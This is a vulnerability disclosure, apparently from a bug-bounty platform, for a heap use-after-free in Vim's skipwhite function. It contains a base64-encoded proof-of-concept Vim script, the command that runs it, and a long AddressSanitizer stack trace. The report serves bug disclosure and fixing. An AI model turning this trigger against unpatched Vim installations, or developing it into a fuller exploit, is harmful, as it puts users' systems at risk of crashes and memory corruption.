Use After Free in vim/vim
Valid
Reported on
Jan 28th 2022
Description
Use after free occurs in skipwhite function (charset.c:1474).
commit : 166788c657f4b1090a31ea37a023b1f2c78790c8
Proof of Concept
$ echo -ne "ZnUgUmUwYTAoZyxuKQp+CnMvCnIwIzAKZW5kZgpzL1wlJykvXD1hMDAwKDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwLCBSZTBhMCgnJywwMDApMDA=" | base64 -d > minimized_poc
ASAN
$ ./vim -u NONE -i NONE -n -X -Z -e -m -s -S minimized_poc -c ":qa!"
=================================================================
==6580==ERROR: AddressSanitizer: heap-use-after-free on address 0x606000000e96 at pc 0x000000d8715c bp 0x7fff87551b20 sp 0x7fff87551b18
READ of size 1 at 0x606000000e96 thread T0
#0 0xd8715b in skipwhite /home/alkyne/fuzzing/vim-asan/src/charset.c:1474:12
#1 0xc099d6 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1803:9
#2 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#3 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#4 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#5 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#6 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#7 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#8 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#9 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#10 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#11 0xc09526 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1724:6
#12 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#13 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#14 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#15 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#16 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#17 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#18 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#19 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#20 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#21 0x5f9759 in eval0_retarg /home/alkyne/fuzzing/vim-asan/src/eval.c:2332:11
#22 0x5ee7d7 in eval0 /home/alkyne/fuzzing/vim-asan/src/eval.c:2307:12
#23 0x5ee7d7 in eval_to_string_eap /home/alkyne/fuzzing/vim-asan/src/eval.c:530:9
#24 0x96eae8 in vim_regsub_both /home/alkyne/fuzzing/vim-asan/src/regexp.c:2070:17
#25 0x96f0b8 in vim_regsub_multi /home/alkyne/fuzzing/vim-asan/src/regexp.c:1941:14
#26 0x66b761 in ex_substitute /home/alkyne/fuzzing/vim-asan/src/ex_cmds.c:4404:12
#27 0x67f55c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
#28 0x67f55c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
#29 0xc10279 in call_user_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2805:2
#30 0xc10279 in call_user_func_check /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2952:2
#31 0xc0aeec in call_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:3499:11
#32 0xc09c18 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1778:8
#33 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#34 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#35 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#36 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#37 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#38 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#39 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#40 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#41 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#42 0xc09526 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1724:6
#43 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#44 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#45 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#46 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#47 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#48 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#49 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#50 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#51 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#52 0x5f9759 in eval0_retarg /home/alkyne/fuzzing/vim-asan/src/eval.c:2332:11
#53 0x5ee7d7 in eval0 /home/alkyne/fuzzing/vim-asan/src/eval.c:2307:12
#54 0x5ee7d7 in eval_to_string_eap /home/alkyne/fuzzing/vim-asan/src/eval.c:530:9
#55 0x96eae8 in vim_regsub_both /home/alkyne/fuzzing/vim-asan/src/regexp.c:2070:17
#56 0x96f0b8 in vim_regsub_multi /home/alkyne/fuzzing/vim-asan/src/regexp.c:1941:14
#57 0x66b761 in ex_substitute /home/alkyne/fuzzing/vim-asan/src/ex_cmds.c:4404:12
#58 0x67f55c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
#59 0x67f55c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
#60 0xc10279 in call_user_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2805:2
#61 0xc10279 in call_user_func_check /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2952:2
#62 0xc0aeec in call_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:3499:11
#63 0xc09c18 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1778:8
#64 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#65 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#66 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#67 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#68 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#69 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#70 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#71 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#72 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#73 0xc09526 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1724:6
#74 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#75 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#76 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#77 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#78 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#79 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#80 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#81 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#82 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#83 0x5f9759 in eval0_retarg /home/alkyne/fuzzing/vim-asan/src/eval.c:2332:11
#84 0x5ee7d7 in eval0 /home/alkyne/fuzzing/vim-asan/src/eval.c:2307:12
#85 0x5ee7d7 in eval_to_string_eap /home/alkyne/fuzzing/vim-asan/src/eval.c:530:9
#86 0x96eae8 in vim_regsub_both /home/alkyne/fuzzing/vim-asan/src/regexp.c:2070:17
#87 0x96f0b8 in vim_regsub_multi /home/alkyne/fuzzing/vim-asan/src/regexp.c:1941:14
#88 0x66b761 in ex_substitute /home/alkyne/fuzzing/vim-asan/src/ex_cmds.c:4404:12
#89 0x67f55c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
#90 0x67f55c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
#91 0xc10279 in call_user_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2805:2
#92 0xc10279 in call_user_func_check /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2952:2
#93 0xc0aeec in call_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:3499:11
#94 0xc09c18 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1778:8
#95 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#96 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#97 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#98 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#99 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#100 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#101 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#102 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#103 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#104 0xc09526 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1724:6
#105 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#106 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#107 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#108 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#109 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#110 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#111 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#112 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#113 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#114 0x5f9759 in eval0_retarg /home/alkyne/fuzzing/vim-asan/src/eval.c:2332:11
#115 0x5ee7d7 in eval0 /home/alkyne/fuzzing/vim-asan/src/eval.c:2307:12
#116 0x5ee7d7 in eval_to_string_eap /home/alkyne/fuzzing/vim-asan/src/eval.c:530:9
#117 0x96eae8 in vim_regsub_both /home/alkyne/fuzzing/vim-asan/src/regexp.c:2070:17
#118 0x96f0b8 in vim_regsub_multi /home/alkyne/fuzzing/vim-asan/src/regexp.c:1941:14
#119 0x66b761 in ex_substitute /home/alkyne/fuzzing/vim-asan/src/ex_cmds.c:4404:12
#120 0x67f55c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
#121 0x67f55c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
#122 0xc10279 in call_user_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2805:2
#123 0xc10279 in call_user_func_check /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2952:2
#124 0xc0aeec in call_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:3499:11
#125 0xc09c18 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1778:8
#126 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#127 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#128 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#129 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#130 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#131 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#132 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#133 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#134 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#135 0xc09526 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1724:6
#136 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#137 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#138 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#139 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#140 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#141 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#142 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#143 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#144 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#145 0x5f9759 in eval0_retarg /home/alkyne/fuzzing/vim-asan/src/eval.c:2332:11
#146 0x5ee7d7 in eval0 /home/alkyne/fuzzing/vim-asan/src/eval.c:2307:12
#147 0x5ee7d7 in eval_to_string_eap /home/alkyne/fuzzing/vim-asan/src/eval.c:530:9
#148 0x96eae8 in vim_regsub_both /home/alkyne/fuzzing/vim-asan/src/regexp.c:2070:17
#149 0x96f0b8 in vim_regsub_multi /home/alkyne/fuzzing/vim-asan/src/regexp.c:1941:14
#150 0x66b761 in ex_substitute /home/alkyne/fuzzing/vim-asan/src/ex_cmds.c:4404:12
#151 0x67f55c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
#152 0x67f55c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
#153 0xc10279 in call_user_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2805:2
#154 0xc10279 in call_user_func_check /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2952:2
#155 0xc0aeec in call_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:3499:11
#156 0xc09c18 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1778:8
#157 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#158 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#159 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#160 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#161 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#162 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#163 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#164 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#165 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#166 0xc09526 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1724:6
#167 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#168 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#169 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#170 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#171 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#172 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#173 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#174 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#175 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#176 0x5f9759 in eval0_retarg /home/alkyne/fuzzing/vim-asan/src/eval.c:2332:11
#177 0x5ee7d7 in eval0 /home/alkyne/fuzzing/vim-asan/src/eval.c:2307:12
#178 0x5ee7d7 in eval_to_string_eap /home/alkyne/fuzzing/vim-asan/src/eval.c:530:9
#179 0x96eae8 in vim_regsub_both /home/alkyne/fuzzing/vim-asan/src/regexp.c:2070:17
#180 0x96f0b8 in vim_regsub_multi /home/alkyne/fuzzing/vim-asan/src/regexp.c:1941:14
#181 0x66b761 in ex_substitute /home/alkyne/fuzzing/vim-asan/src/ex_cmds.c:4404:12
#182 0x67f55c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
#183 0x67f55c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
#184 0xc10279 in call_user_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2805:2
#185 0xc10279 in call_user_func_check /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2952:2
#186 0xc0aeec in call_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:3499:11
#187 0xc09c18 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1778:8
#188 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#189 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#190 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#191 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#192 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#193 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#194 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#195 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#196 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#197 0xc09526 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1724:6
#198 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#199 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#200 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#201 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#202 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#203 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#204 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#205 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#206 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#207 0x5f9759 in eval0_retarg /home/alkyne/fuzzing/vim-asan/src/eval.c:2332:11
#208 0x5ee7d7 in eval0 /home/alkyne/fuzzing/vim-asan/src/eval.c:2307:12
#209 0x5ee7d7 in eval_to_string_eap /home/alkyne/fuzzing/vim-asan/src/eval.c:530:9
#210 0x96eae8 in vim_regsub_both /home/alkyne/fuzzing/vim-asan/src/regexp.c:2070:17
#211 0x96f0b8 in vim_regsub_multi /home/alkyne/fuzzing/vim-asan/src/regexp.c:1941:14
#212 0x66b761 in ex_substitute /home/alkyne/fuzzing/vim-asan/src/ex_cmds.c:4404:12
#213 0x67f55c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
#214 0x67f55c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
#215 0xc10279 in call_user_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2805:2
#216 0xc10279 in call_user_func_check /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2952:2
#217 0xc0aeec in call_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:3499:11
#218 0xc09c18 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1778:8
#219 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#220 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#221 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#222 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#223 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#224 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#225 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#226 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#227 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#228 0xc09526 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1724:6
#229 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#230 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#231 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#232 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#233 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#234 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#235 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#236 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#237 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#238 0x5f9759 in eval0_retarg /home/alkyne/fuzzing/vim-asan/src/eval.c:2332:11
#239 0x5ee7d7 in eval0 /home/alkyne/fuzzing/vim-asan/src/eval.c:2307:12
#240 0x5ee7d7 in eval_to_string_eap /home/alkyne/fuzzing/vim-asan/src/eval.c:530:9
#241 0x96eae8 in vim_regsub_both /home/alkyne/fuzzing/vim-asan/src/regexp.c:2070:17
#242 0x96f0b8 in vim_regsub_multi /home/alkyne/fuzzing/vim-asan/src/regexp.c:1941:14
#243 0x66b761 in ex_substitute /home/alkyne/fuzzing/vim-asan/src/ex_cmds.c:4404:12
#244 0x67f55c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
#245 0x67f55c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
#246 0xc10279 in call_user_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2805:2
#247 0xc10279 in call_user_func_check /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2952:2
#248 0xc0aeec in call_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:3499:11
#249 0xc09c18 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1778:8
#250 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#251 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#252 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#253 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#254 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#255 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#256 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#257 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#258 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#259 0xc09526 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1724:6
#260 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#261 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#262 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#263 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#264 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#265 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#266 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#267 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#268 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#269 0x5f9759 in eval0_retarg /home/alkyne/fuzzing/vim-asan/src/eval.c:2332:11
#270 0x5ee7d7 in eval0 /home/alkyne/fuzzing/vim-asan/src/eval.c:2307:12
#271 0x5ee7d7 in eval_to_string_eap /home/alkyne/fuzzing/vim-asan/src/eval.c:530:9
#272 0x96eae8 in vim_regsub_both /home/alkyne/fuzzing/vim-asan/src/regexp.c:2070:17
#273 0x96f0b8 in vim_regsub_multi /home/alkyne/fuzzing/vim-asan/src/regexp.c:1941:14
#274 0x66b761 in ex_substitute /home/alkyne/fuzzing/vim-asan/src/ex_cmds.c:4404:12
#275 0x67f55c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
#276 0x67f55c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
#277 0xc10279 in call_user_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2805:2
#278 0xc10279 in call_user_func_check /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2952:2
#279 0xc0aeec in call_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:3499:11
#280 0xc09c18 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1778:8
#281 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#282 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#283 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#284 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#285 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#286 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#287 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#288 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#289 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#290 0xc09526 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1724:6
#291 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#292 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#293 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#294 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#295 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
0x606000000e96 is located 54 bytes inside of 57-byte region [0x606000000e60,0x606000000e99)
freed by thread T0 here:
#0 0x496f8d in free (/home/alkyne/fuzzing/vim-asan/src/vim+0x496f8d)
#1 0x66d171 in ex_substitute /home/alkyne/fuzzing/vim-asan/src/ex_cmds.c:3789:3
#2 0x67f55c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
